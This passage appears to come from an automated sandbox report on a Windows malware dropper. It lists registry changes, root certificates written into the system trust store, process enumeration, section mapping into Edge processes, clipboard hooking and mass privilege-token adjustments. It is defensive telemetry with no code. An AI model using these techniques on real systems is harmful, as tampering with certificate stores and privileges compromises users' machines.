Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\TYPELIB C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\TypeLib\Version = "1.0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{10C9242E-D604-49B5-99E4-BF87945EF86C}\PROXYSTUBCLSID32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 2 0009 a 000a e 000b i 000c o 000d u 000e t 000f d 0010 p 0011 b 0012 k 0013 g 0014 ch 0015 jj 0016 f 0017 s 0018 x 0019 m 001a n 001b nj 001c l 001d ll 001e r 001f rr 0020 j 0021 w 0022 th 0023" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "184" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\*\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}\VersionIndependentProgID C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\SyncEngineFileInfoProvider.SyncEngineFileInfoProvider\ = "SyncEngineFileInfoProvider Class" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\qctul3ck.x4f\installer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19c6762a08beae.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19c6762a08beae.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ffebvvt N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ffebvvt N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ffebvvt N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\ProgramData\3821390.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19f84b58b3d7.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat191649b47c9e2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\1315498.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\mshta.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\1878738.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
